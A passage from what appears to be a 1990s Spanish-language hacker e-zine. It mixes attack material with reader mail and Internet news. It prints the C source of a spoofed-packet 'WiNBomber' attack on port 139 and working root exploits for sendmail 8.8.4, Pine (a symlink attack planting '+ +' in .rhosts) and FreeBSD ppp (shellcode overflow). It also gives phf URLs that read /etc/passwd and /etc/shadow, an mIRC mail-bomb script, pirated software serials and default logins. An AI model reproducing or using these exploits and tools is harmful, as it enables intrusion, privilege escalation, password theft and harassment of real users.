=0A=

        if ((daddr =3D resolve(argv[2])) =3D=3D -1) {           /* Resolve

destination =

*/=0A=

                printf("Unable to resolve destination hostname -> %s\n",

argv[2]);=0A=

                exit(1);=0A=

                }=0A=

=0A=

        if ((saddr =3D resolve(argv[1])) =3D=3D -1) {=0A=

                printf("Bad spoofed source -> %s\nOhh well...using

default.\n\n", =

argv[1]);=0A=

                saddr=3Dinet_addr(DEF_BADDR);=0A=

                }=0A=

        =0A=

=0A=

        dport =3D 139;=0A=

=0A=

/* =

************************************************************************=

**************** */     =0A=

=0A=

=0A=

        bzero(&sin, sizeof(struct sockaddr_in));=0A=

        sin.sin_family=3DAF_INET;=0A=

        sin.sin_addr.s_addr=3Ddaddr;=0A=

        sin.sin_port=3Dhtons(139);      =0A=

=0A=

=0A=

/*      =

***************************************************************** */=0A=

=0A=

        if ((mainsock =3D socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)

{=0A=

                perror("Unable to open main socket.");=0A=

                exit(1);=0A=

        }=0A=

=0A=

        if ((fakesock =3D socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {=0A=

                perror("Unable to open raw socket.");=0A=

                exit(1);=0A=

        }=0A=

        =0A=

        =0A=

        if (connect(mainsock, (struct sockaddr *)&sin, 16)=3D=3D -1) {=0A=

           perror("Unable to open connection:");=0A=

           close(mainsock);=0A=

           }=0A=

           =0A=

/*      =

***************************************************************** */       =

=0A=

=0A=

        printf("WiNBomber 0.9 by HeTak.\n");=0A=

        printf("Connection established.\n");=0A=

        printf("Sending <%d> bombs to port <%d> to <%s>...\n", =0A=

                        bombs, ntohs(sin.sin_port), argv[2] );=0A=

        printf("Ready to bomb. Sleeping for a while.\n");=0A=

        sleep(3);=0A=

        while(bombs!=3D10) {=0A=

                printf("<%s> >=3D----=3D|B+O+M+B|=3D-----> <%s:139>\t#

<%d>\n",=0A=

                        argv[1], argv[2], bombs);=0A=

                bombaway(&sin, fakesock, saddr);=0A=

                usleep(100000);=0A=

                bombs++;=0A=

        }=0A=

        printf("Bombs dropped.\n");=0A=

        exit(0);=0A=

}=0A=

=0A=

=0A=

=0A=

=0A=


 .:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:..:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.

 Exte exploit es conocido como sendmail v.8.8.4 Crea una programa suid en
 /tmp/x que consigue shell root. Modifica el directorio temporal segun el
 sistema.

cat << _EOF_ >/tmp/x.c

 #define RUN "/bin/ksh"

 #include<stdio.h>

 main()

 {

    execl(RUN,RUN,NULL);

 }

_EOF_

#

cat << _EOF_ >/tmp/spawnfish.c

 main()

 {

   execl("/usr/lib/sendmail","/tmp/smtpd",0);

 }

_EOF_

#

cat << _EOF_ >/tmp/smtpd.c

 main()

 {

   setuid(0); setgid(0);

   system("chown root /tmp/x ;chmod 4755 /tmp/x");

 }

_EOF_

#

#

gcc -O  -o /tmp/x /tmp/x.c

gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c

gcc -O3 -o /tmp/smtpd /tmp/smtpd.c

#

/tmp/spawnfish

kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`

rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c

sleep 5

if [ -u /tmp/x ] ; then

   echo "leet..."

   /tmp/x

fi


 .:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:..:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.

 Este es una buena forma de hackear Pine en sistemas Linux. Viendo la tabla
 de procesos con ps se puede ver quien esta corriendo PINE, ahora uno puede
 hacer ls en el directorio temporal (/tmp) para recoger los nombres lockfile
 de cada usuario. La tabla de procesos otra vez revelara cuando un usuario
 termine PINE o termine de leer sus mensajes del buzon de ingreso y borrando
 su archivo lockfile.

 Creando un link simbolico de /tmp/.hamors_lockfile a ~hamors/.rhosts (como
 un ejemplo) causara que PINE haga un archivo ~hamors/.rhosts como un archivo
 666 con la ID de proceso como su contenido. Una persona puede hacer un
 echo "+ +" > /tmp/.hamors_lockfile y despues remover -rm- el archivo
 /tmp/.hamors_lockfile

 Esto fue escrito por Sean B. Hamor y para este ejemplo hamors es la victima
 mientras catluvr el atacante.

hamors (21 19:04) litterbox:~> pine

catluvr (6 19:06) litterbox:~> ps -aux | grep pine
catluvr   1739  0.0  1.8  100  356 pp3 S    19:07   0:00 grep pine
hamors    1732  0.8  5.7  249 1104 pp2 S    19:05   0:00 pine

catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
- -rw-rw-rw-   1 hamors   elite           4 Aug 26 19:05 .302.f5a4

catluvr (8 19:07) litterbox:~> ps -aux | grep pine
catluvr   1744  0.0  1.8  100  356 pp3 S    19:08   0:00 grep pine

catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4

hamors (23 19:09) litterbox:~> pine

catluvr (11 19:10) litterbox:~> ps -aux | grep pine
catluvr   1759  0.0  1.8  100  356 pp3 S    19:11   0:00 grep pine
hamors    1756  2.7  5.1  226  992 pp2 S    19:10   0:00 pine

catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4

catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4
+ +

catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4

catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors

 .:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:..:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.

 Este es un script que abusa de la vulnerabilidad de PPP en FreeBSD. Si no
 funciona en tu sistema modifica los numeros.

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>



#define BUFFER_SIZE     156     /* size of the bufer to overflow */



#define OFFSET          -290    /* number of bytes to jump after the start

                                   of the buffer */



long get_esp(void) { __asm__("movl %esp,%eax\n"); }



main(int argc, char *argv[])

{

        char *buf = NULL;

        unsigned long *addr_ptr = NULL;

        char *ptr = NULL;

        char execshell[] =

        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */

        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */

        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"  /* 20 bytes */

        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";    /* 15 bytes, 57 total */

   

        int i,j;



        buf = malloc(4096);



        /* fill start of bufer with nops */



        i = BUFFER_SIZE-strlen(execshell);



        memset(buf, 0x90, i);

        ptr = buf + i;



        /* place exploit code into the buffer */



        for(i = 0; i < strlen(execshell); i++) 

                *ptr++ = execshell[i];



        addr_ptr = (long *)ptr;

        for(i=0;i < (104/4); i++)

                *addr_ptr++ = get_esp() + OFFSET;



        ptr = (char *)addr_ptr;

        *ptr = 0;



        setenv("HOME", buf, 1);



        execl("/usr/sbin/ppp", "ppp", NULL);

}



 .:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:..:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.

 Estos exploits fueron recopilados y pasados a mi por muchos amigos y
 compaeros de grupo. Ninguno de nosotros escribio estos programas y
 dependiendo del sistema las debidas correcciones al codigo deberan ser
 hechas.

[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
     <<::RareGaZz::>> Prueba de que existe vida inteligente en internet 
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]

                            
                               
                         
                                    
                               
           * Tu linea de comunicacion segura con el underground *
                            Mail Boy: Raretrip

 Saludos aqui estamos de nuevo gracias por esperar. Para cuando lean esta
 seccion si no se brincaron ninguna otra ya tandran una idea de como estuvo
 este numero y espero que la espera haya valido la pena.
 En el numero pasado empezamos el proyecto HACKERZ que pretende crear grupos
 o celulas de hackers en distintas partes del globo terraqueo pero nunca me
 imagine que existieran tantas ciudades en el mundo...encontrar dos iguales
 es muy dificil asi que sigan mandando sus datos por que vale la pena.
 Sus datos no seran usados para daarlos de hecho en cuanto ustedes nos lo
 soliciten podran ser removidos del proyecto. Por la seguridad de nuestros
 compaeros NO se aceptaran datos de las ciudades de Espaa :( lo sentimos
 pero aun siguen las represalias en contra de los hackers espaoles y no
 quisieramos que por nuestra culpa capturaran a otro.

 A todos los que se preocuparon por sus datos y direcciones email es necesario
 decirles que solamente yo tengo derecho a guardarlos en mi disco duro y
 en todo momento (hasta que llega otro dato) permanecen encriptados al igual
 que la lista de correo usando Blowfish 32 con una llave larga y se encuentra
 en la particion encriptada con Secure Drive de mi disco. Si algo me llegara
 a pasar -otra vez- no hay de que preocuparse sus datos no seran revelados
 asi como las direcciones en la lista de correo. Dios bendiga los algoritmos
 de encripcion :)))

 () () () () () () () () () () () () ()() () () () () () () () () () () () ()

 NoTa: No estaria mal que en los proveedores que a veces ponen pusieran
       la direccion IP o el dominio aparte de telefono porque la verdad eso
       de hacer llamadas a ensenada, venezuela, etc. sale caro.:-)

 [ Ok. ]

 () () () () () () () () () () () () ()() () () () () () () () () () () () ()

 Me gustaria ver si me aceptan y me ayuden a incorporarme a este mundo tan
 interesante. Soy novato y tengo mucho que aprender.

 [ La lista de RareGaZz no es club privado todos pueden entrar. Para
   participar solamente tienes que enviar tus sugerencias o textos y taran. ]

 () () () () () () () () () () () () ()() () () () () () () () () () () () ()

Necesito informacion de como interceptar un e-mail. Pueden brindarmela? Otra
cosa, los numeros de registro del Cool 96 no me andan. Por que puede ser? Les
agradezco su colaboracion.

 [ Para interceptar un mail (o muchos) nada mas necesitas tu propio servidor
   y configurarlo para que sirva de ruteador de email :) Ahora cuando pase por
   tu sistema puedes instalar un "filtro" que capture mensajes con palabras
   escogidas por ti. Los numeros de registro si no te funcionan no se por que
   pero aqui van otros:

   Cool edit v1.50 for Windows  name/You! #/BMJZCPUX
   Cool edit v1.51 for Windows  name/COOL MAN #/XJMINCLE
   CoolEdit +v1.51 for Windows  name: The GuaRDiaN aNGeL s/n: BZFLNMAR
   CoolEdit +v1.51 Lite for Windows name: tHE riDDLER [uCF] s/n: ZPXSEWLF
   CoolEdit v1.52 Full for Windows  name: tHE riDDLER [uCF] s/n: CMFRQENH

   P.D. Si quieres recibir respuesta mas rapida para la otra que mandes un
   mensaje usando remailers incluye una direccion email donde podamos
   contestar ;-)  ]

 () () () () () () () () () () () () ()() () () () () () () () () () () () ()

 [Gratismail es el peor servicio de email que existe!! Lo sentimos pero todos
 los mensajes que la lista mando para ese server rebotaron y no pudo llegar
 ninguno a su destino. Si su direccion que esta en nuestra lista es de ahi
 mil disculpas si no recibieron notificacion cuando aparecio el numero nuevo.
 Por ahi recomienda nuestro amigo Arkangel http://www.mailcity.com ]

 () () () () () () () () () () () () ()() () () () () () () () () () () () ()

 Queria pediros si tendrias algun crackeador para los juegos Indy3 y Loom.
 Muchas gracias. Jorge.

 [ Visita http://hack.box.sk -gracias extreme- y en la seccion de cracks o
   serials seguro encuentran lo que buscan. ]

 () () () () () () () () () () () () ()() () () () () () () () () () () () ()

Saludos amigos!!

Soy de espaa, y el otro dia encontre casi por casualidad vuestra revista.
Estaba mirando por ahi, en los buscadores,y de pronto... anda! si existen
revistas con temas de hacking por sudamerica!! :)) Dicho y hecho, cogi los
numeros (en total habia 6, teneis mas :? ) y me los lei avidamente. Despues de
haberlos leido, llege a la conclusion de que la revista era exactamente lo que
esperaba; un nivel aceptable, con articulos facilones de entender (a veces
demasiado faciles) y otras veces articulos con un nivel tecnico muy
interesante.

Por cierto... no se si lo tendreis, pero aqui va la direccion de la pagina
oficial de #!hispahack:

 http://www.angelfire.com/hi/MentesInquietas

 () () () () () () () () () () () () ()() () () () () () () () () () () () ()

 puede un hacker afectar el sistema de un usario atravez de los chat 
 java como el planetachat (chat venezolano)? gracias y sigan con su excelente
 revista que a todos nos sirve. Clark

 [ Java es seguro en ese aspecto. Por ahi existia un programa para hackear los
   chat rooms de geocities basados en frames. No recuerdo la direccion pero se
   que  existen programas para hackear los chat rooms basados en frames es por
   eso que geocities ya tiene pocos o ningun chat room basado en frames.
   Si alguien sabe como hackear los chat rooms basados en java o tiene algun
   programa que lo haga ... podria enviarlo o decirnos donde encontrarlo? ]

 () () () () () () () () () () () () ()() () () () () () () () () () () () ()

 quisiera saber mas sobre la etiqueta entre hackers. Porque tengo miedo que
 usen de sus habilidades para hacker mi IP, o algo parecido. No se hasta donde
 podrian llegar. Existe el respeto entre hackers (aunque yo no sea uno)?
 Gracias por su contestacion.

 [ Nosotros no daamos a ningun lector o miembro de nuestra lista de correo.
   Si alguien piensa que esto no es cierto envienos sus razones y las
   publicaremos y discutiremos en esta seccion. De que serviria hackear a los
   que nos escriben o consultan??  Por que hariamos dao a los lectores ?
   Por que enseariamos a hackear entonces?  ]

 () () () () () () () () () () () () ()() () () () () () () () () () () () ()

 En el numero 4 hablan de algunas personas molestandolos.  que paso ?

 [ Muertos. Las direcciones de correo que usaban desaparecieron de la faz de
   i-net tambien las paginas web que tenian en spin y teesa fueron borradas
   por ellos mismos cuando misteriosamente se convirtieron en un mirror site
   de la pagina de raregazz :-) Los nicks de estas personas son: Eduardo Q.
   Gonzalez, Francisco Castro Ortiz y Gina D. Hasta el momento no hemos
   vuelto a tener problemas con ellos. ;-) ]

 () () () () () () () () () () () () ()() () () () () () () () () () () () ()

 Hay maneras de recargar las tarjetas ladatel ? si es asi me gustaria que me
 dijeran como. Ademas de que me gustaria saber como llamar gratuitamente en
 los telefonos de tarjetas. No se saben algun codigo ?

 [ Las tarjetas no se pueden recargar de ninguna forma no importa lo que
   digan otras personas. No, si las dejas al sol no se recargan. Tampoco se
   recargaran en el refrigerador ni con el martillo. ]

 () () () () () () () () () () () () ()() () () () () () () () () () () () ()

 No saben algo de un programa llamado PROGRESS de como crackearlo es muy
 importante. azumlord@hotmail.com

 () () () () () () () () () () () () ()() () () () () () () () () () () () ()

 Hola!!! que onda! que haciendo me he ausentado un buen de la red por la
 pendejada de un servidor de mi ciudad que trae un conflicto con las paginas
 de hipertexto y nada mas se puede mediante TELNET y pues el que tengo es una
 vil cagada, cual me recomiendas?, ahhh!!!! oye me pudes enviar una copia del
 INTERHAK pues he leido de el en la revista y pues se ve que esta fregon.
 bueno ya te dejo espero tu respuesta pronto. :-)  BYE.

 [ Interhak va a estar disponible otra vez en el servidor de geocities lo
   puedes conseguir en nuestra pagina de software en "hacking" o haciendo
   click en este link: http://www.geocities.com/Baja/4426/interhak.zip Una
   copia del programa TELNET.EXE para Windows 95 que permite seleccionar el
   puerto al que quieres realizar una conexion esta en la pagina de software
   seccion internet. ]

 () () () () () () () () () () () () ()() () () () () () () () () () () () ()

 ojala pudieran decirme como ubicar informacion hacerca de la programacion de
 moviles celulares (NOKIA 104-105) , saludos...

 [ Si alguien por ahi sabe de la programacion de celulares ... ]

 () () () () () () () () () () () () ()() () () () () () () () () () () () ()

 a toda madre carnal se pasaron con el anuncio a cuanto les salio ?
                                                     christian

 [ Yo no lo he visto pero se que cuesta $65 pesos cada vez que sale en t.v. ]

 () () () () () () () () () () () () ()() () () () () () () () () () () () ()

 AHORA LES MANDO UN TELEFONO QUE HE ENCONTRADO DE MI PROVEEDOR, QUE SOLO
 FUNCIONA EN SAN JOSE DEL CABO, BAJA CALIFORNIA SUR. EL TELEFONO ES 22883, ES
 EL UNICO QUE HE ENCONTRADO.

 [ Gracias por el numero!  cual es la direccion IP ? ]

 () () () () () () () () () () () () ()() () () () () () () () () () () () ()

 [ GuyBrush nos manda los defaults de IRIS que solicitamos el numero pasado! ]

     accounting
     boss
     demo
     manager
     pdp8
     pdp11
     software

 () () () () () () () () () () () () ()() () () () () () () () () () () () ()

 Me podeis decir donde puedo encontrar buenos programas para nukear a
 gente en el IRC?

 () () () () () () () () () () () () ()() () () () () () () () () () () () ()

 necesito urgentemente conseguir los programas kaboom3 y upyours3.zip que
 segun esto deverian de ser disponibles en la seccion de e-mail de
 raregazz, pero cada vez que trato de bajarlos me dice que no estan
 disponibles, y es de a neta que necesito un buenprograma para chingar
 passwords de e-mail, en especial de hotmail. urgente.

 [ Ya estan los links en la pagina funcionando, si alguno falla pueden
   avisarnos.  Ahora, si quieres saber el password de una cuenta en hotmail
   va a estar kbron. Estan algo protegidos de personas con las mismas
   intenciones. Pero este bug *SERVIA* en hotmail para obtener el passwd,
   ahora ya no sirve por que pusieron shadow y arreglaron el bug.

   Para capturar el passwd
   http://www.host.com/cgi-bin/phf?Qalias=%0a/bin/cat%20/etc/passwd

   Para capturar el shadow
   http://www.host.com/cgi-bin/phf?Qalias=%0a/bin/cat%20/etc/shadow        ]

 () () () () () () () () () () () () ()() () () () () () () () () () () () ()

 Hay una manera de mandar e-mails totalmente anonimo con el Mirc, y cuando me
 refiero a anonimos ME REFIERO A ANONIMOS, su unico defecto es que no puedes
 mandar mensajes muy largos por el buffer del Mirc pero ando tratando de
 corregir eso :)

A continuacion adjunto los comandos para lograr mandar un e-mail anonimo:

corten y copien esto en el aliases:
------------------------------------------------------------------

doclos { unset %mail.wi* | window -c @BoMBa De E-MaiL }
mailb {
  %mail.* | if (%mail.me != $null) { close -c %mail.me } | killc
  window -doe @BoMBa De E-MaiL 173 169 312 111 fixedsys | .timer3434 1 
80 doclos 
  set  %mail.win on
  .echo @BoMBa De E-MaiL  Nmero de mails: 
}
/bc { 
%r = $$1 $2 $3 $4 $5 | %l = $len(%r) | %nco = 1 | %bb = $chr(0160) | 
%bbc = $chr(44) | %bbs = $chr(3) | %bbo = $chr(15) | %bba = $chr(42) | 
%o = 1 | %o1 = 1 | %line = "" | :lop | if %o = 6 goto end | %o1 = 1 | 
%line = "" | :red | if %o1 > %l { /say %line | /inc %o | goto lop } | 
%lt = $mid(%o1,1,%r) | if %lt = $chr(32) set %lt sp | %rt = %lt $+ %o | 
%lin = $readini $mircdir $+ font.txt %lt %rt | %nco = %o1 | if %nco == 
16 /set %nco 7 | %mgl = %bbs $+ %nco $+ %bbc $+ %nco $+ %bb $+ %bbo | 
%clin = $replace(%lin,%bba,%mgl) | if %lt = sp set %clin %lin | %line = 
%line %clin | /inc %o1 | goto red | :end }
mail { 
  inc %mailbomb
  msg = $+ %mail.me MAIL FROM:< $+ %mail.from $+ >
  msg = $+ %mail.me RCPT TO:< $+ %mail.to $+ >
  msg = $+ %mail.me DATA
  msg = $+ %mail.me Date: 23 Oct 81 11:22:33
  msg = $+ %mail.me From: %mail.from
  msg = $+ %mail.me To: %mail.to
  msg = $+ %mail.me Subject: %mail.subject
  msg = $+ %mail.me %mail.txt
  msg = $+ %mail.me . 
  echo = $+ %mail.me 4  %mailbomb  Mails enviados.
  if (%mailbomb >= %mail.bombs) { close -c %mail.me | .disable #mail | 
echo -a 4Fueron enviados  $+ %mailbomb $+  mails a %mail.to | unset 
%mail.* }
  .disable #mail
}

--------------------------------------------------------------------

Luego esto en el remote:
--------------------------------------------------------------------

on 1:chat:*Message accepted for delivery:{ mail }
#mail on
on 1:chatopen:{ if ($nick = $me) { set %mailbomb 0 | msg = $+ $me helo } 
| set %mail.me $me }
on 1:chat:*pleased to meet you:{ mail | inc %mail.bomb | .disable #mail 
}
#mail end

---------------------------------------------------------------------

Haaa!! Estas son bombas por e-mail, es muy bueno para bombardear ya que es
bastante rapido, para ejecutar la funcion solo teclea /mailb y listo, en
pantalla te pedira los datos.

   ATTE: CaZadOR

 () () () () () () () () () () () () ()() () () () () () () () () () () () ()

 [ He visto muchos articulos sobre Internet en periodicos, revistas y en
   television pero la gran parte responden a interes economicos y unicamente
   contribuyen al gran hype sobre internet y a la sobrepoblacion de la red.
   Pero de vez en vez me encuentro con muy buenos articulos sobre la red que
   son escritos por personas que analizan objetivamente los recursos de
   internet. Esta vez dos escritores mexicanos contribuyen con sus articulos
   al poco material objetivo sobre internet que sobrevive en algunos paises
   del mundo. Disfruten. ]

 Gozosamente atrapados en la pegajosa telaraa de la red de Internet tejida
 en el ciberespacio por todas las manos del mundo, Victor Flores Olea y Rosa
 Elena Gaspar de Alba no se resistieron a la reflexion sobre su origen, su
 significado y su impacto, para bien o para mal, en un mundo tan complejo como
 el que habitamos.

 El resultado de sus dudas, de su curiosidad, de sus busquedas, de su
 necesidad de analisis y de interpretacion es el libro Internet y la
 revolucion cibernetica, editado por Oceano y que comenzo a circular el jueves
 pasado, luego de su presentacion formal la noche del jueves pasado en la
 Casa Lamm.

 Entre las muchas interrogantes que se formulan ahi el extitular del Consejo
 Nacional para la Cultura y las Artes y la arqueologa Gaspar de Alba, figuran
 las siguientes:

 -Internet podra ser un dia controlado por unas cuantas corporaciones enormes
 integradas verticalmente para a su vez controlar la produccion y la
 distribucion de la informacion?

 -En el desarrollo de Internet se limitara en el futuro la privacia,
 perdiendose la libertad de palabra y de expresion, convirtiendose estos
 valores unicamente en un recuerdo del pasado?

 -Internet ahondara las diferencias entre paises pobres y ricos, y aun entre
 pobres y ricos de un mismo pais, por el hecho de masivas desigualdades, mas
 pronunciadas que ahora, en el acceso a la informacion?

 -O bien, Internet contribuira a reducir esas diferencias y a difundir
 informacion entre quienes carecen de ella?

 -Internet propiciara una mayor responsabilidad de los gobiernos y una mayor
 actividad politica de la sociedad, beneficiando a la mayoria con nuevos
 estimulos educativos y con mayores beneficios economicos?

 De 140 paginas, el volumen "no es un manual", advierte Flores Olea en
 entrevista, aunque contiene una amplia seccion de "lexico cibernetico".
 Se trata, dice, de un libro de reflexiones sobre las consecuencias del
 Internet, sobre sus significados en lo politico, lo social, lo cultural: los
 pros y los contras. Y adelanta: "En los terminos de Walter Benjamin, Internet
 implica una democratizacion de la cultura."
 E interroga: si?, no?: la discusion esta ahi.

 En el origen, relata, Internet no era sino una estrategia de seguridad para
 el gobierno norteamericano, que preservaba informacion clasificada en un
 sistema descentralizado al modo de una telaraa, que no fuera destruible por
 acciones de guerra o por actos de sabotaje. Era, ilustra, como un hormiguero
 sin central.

 A pesar de su origen militar estrategico, Internet fue retomado luego por la
 investigacin cientifica y cultural para entrelazar a los academicos, a las
 universidades. Mas tarde, se invento un protocolo de mayor amplitud, y el
 circulo selectivo de instituciones comenzo a crecer hasta el punto que se
 calcula que para el ao 2000 la red habra de contar con unos 300 millones de
 usuarios en todo el mundo.

 De modo que Internet y la revolucion cibernetica surge basicamente de la
 experiencia de un par de usuarios, "sin mas pretensiones que la idea de
 reflexionar sobre cual es el medio en el que nos estamos metiendo, cuales
 son las implicaciones de tipo economico, cultural, politico y social que
 podria tener".

 Y seala Flores Olea:

 "Yo creo que Internet esta muy vinculado con el tema de la globalizacion,
 que de hecho es una de las formas de la globalizacion contemporanea, de la
 comunicacion planetaria, con las facilidades tecnicas, sencillas, que se
 tienen, con la difusion extraordinaria de las computadoras personales, y con
 el hecho de que con una llamada local se puede estar en contacto con
 cualquier sitio del mundo y obtener documentacion. Esto es de una importancia
 extraordinaria para la proliferacion de Internet."

 Para Flores Olea, asimismo, "la tecnologia `per se' es indiferente, pero
 depende de la estructura social y economica para la que se utilice". Explica
 entonces:

 "La television, a fin de cuentas, esta en manos del mercado, y todo su
 contenido esta marcado por esos intereses economicos que han invertido en
 ella, aunque hay paradojas, porque la competencia ha exigido que las cadenas
 de television informen sobre una cantidad de cosas de las que normalmente no
 tendrian por que informar, como las contradicciones de la sociedad, la
 miseria, las enfermedades en Africa."

 En este sentido, agrega, "una de las preguntas que nos hacemos es si Internet
 es un instrumento de esta globalizacion del capitalismo, o si tiene ademas
 otras consecuencias, y nosotros creemos que si esta dentro de la
 globalizacion del capitalismo;  es decir, sin el desarrollo y las
 intercomunicaciones, y sin la necesidad de un mercado mundial como el que
 plantea hoy el capitalismo, probablemente no se habria desarrollado
 Internet".

 Asi, advierte, "las previsiones son que el mercado mundial sera el dia de
 maana un mercado a traves de Internet; en Estados Unidos ya lo estan
 haciendo y nosotros estamos absolutamente atrasados".

 Los autores sostienen en su libro "que tal vez esto sea imparable, pero
 insistimos en que debe mantenerse tambien el aspecto cultural, creativo, de
 informacion de otra naturaleza y no puramente mercantil". [ En eso estamos! ]

 Observan, tambien, que "todo el aspecto social y politico que tiene Internet,
 por ejemplo la presencia de las organizaciones no gubernamentales en el
 mundo, es fundamental, y esto enlaza a las comisiones o grupos de derechos
 humanos en el mundo, los que luchan por los grupos etnicos, por el medio
 ambiente, por la mujer, la niez; todo el mundo de objetivos sociales, que
 no son mercantiles, estan tambien presentes en Internet, entonces ahi
 coexisten las preocupaciones por problemas sociales universales y locales".

 Por ejemplo, dice, "una de las paginas mas actualizadas y que mas circulan en
 Internet es la del Ejercito Zapatista de Liberacion Nacional".

 Y analiza:

 "Tenemos una muestra muy clara de como la aldea local, incluso marginada,
 unos rebeldes confinados en una region de un pais, tienen una presencia en la
 red absolutamente abierta, como la tienen la General Motors o la Casa Blanca.
 Esta es una presencia que han logrado los zapatistas con un gran talento, y
 por eso han tenido tanto reflejo en Europa, Canada y Estados Unidos. Incluso,
 todos sus documentos estn en un par de idiomas: ingles y frances. Asi, lo
 que ocurre en un rincon del mundo se convierte en un tema universal. Yo creo
 que este es de los aspectos mas positivos de Internet: la aldea global se
 hace universal y lo universal llega a las localidades."

 1997 Derechos Reservados, Comunicacion e Informacion S.A. de C.V.
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 http://www.proceso.com.mx

 () () () () () () () () () () () () ()() () () () () () () () () () () () ()

 Hasta pronto! No se cuanto se tarde en salir el siguiente numero o quien lo
 ira a editar pero si se que estaremos esperando sus mensajes como siempre.
 Si alguno de ustedes no recibio aviso cuando aparecio este numero mil
 disculpas pero no todos los forms nos llegan asi que envia un mensaje por
 e-mail solicitando estar en la lista y se soluciona todo.

               " Cuando ser hacker se convierta en algo ilegal,
                 solo los delincuentes seremos hackers. "

[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
           Dinamita - El mejor exploit para estrellar un sistema. 
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]

                                  << NotiLOONS >>
                                     By Groovy

                  ` La informacion necesaria para vivir sanamente '

 +=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+

 Internet: La nueva droga
 ========================

 Un joven de 17 aos enloquecio en un centro de rehabilitacion para
 alcoholicos. Su cuerpo temblaba y arrojaba sillas y mesas alrededor. Estaba
 sufriendo de abstencion, pero no de heroina, cocaina o alcohol...estaba
 sufriendo por falta de internet.

 En la costa oeste americana una mujer pasaba demasiado tiempo en el
 ciberespacio que su esposo tuvo que divorciarse. En ese tiempo la mujer se
 negaba a alimentar a sus hijos o llevarlos al doctor cuando ellos enfermaban.
 Fue el New York Times el que puso en el reflector por primera vez la adiccion
 a internet en USA. Hace apenas unos aos, el abuso de internet no era
 conocido. Ahora mas y mas psicologos advierten sobre las consecuencias para
 las personas que no puedan regular el uso de internet.

 +=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+

 Los casinos en internet estan a punto de ser ilegales en USA. Tambien jugar
 en ellos desde cualquier pais norteamericano sera ilegal si la propuesta es
 aceptada.

 +=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+

 El ultimo nuevo show de Beavis & Butthead es en septiembre 10 por MTV.

 +=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+

 Microsoft anuncio el lanzamiento del diseador mas vendido de paginas html
 Frontpage 98. Una version Beta esta disponible en:
 http://www.microsoft.com/frontpage/

 +=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+

 Microsoft anuncio el lanzamiento oficial de Internet Explorer 4 para el 30 de
 septiembre. Netscape responde ofreciendo el Navigator 4.0 sin ningun
 componente en su website debido a un desacuerdo entre sus afiliados.

 +=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+

 Varios Beta Testers junto con raretrip han sacado el nuevo programa SEND 2.1
 que permite realizar comunicaciones por internet 100% seguras por email.
 Obviamente para el funcionamiento optimo del programa es recomendado contar
 con una copia de PGP para el DOS correctamente instalada pero el programa
 puede hacer mensajes anonimos sin necesidad de usar PGP. El cambio mas
 importante en esta version ha sido el manejo grafico de las opciones y asi
 como una interfaz intuitiva para el usuario. amazing!

 [ Poco antes de publicar este texto 18 (si asi es 18!) errores fueron
   encontrados en la version Beta que se empezo a distribuir hace poco. Por
   favor espera de una a dos semanas antes de bajar este programa en
   http://www.geocities.com/Baja/4426/remail.zip
   No te arrepentiras cuando lo veas funcionar correctamente ;-)  ]

 +=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+

 En Mexico se estan estudiando leyes contra los llamados "hackers" que se
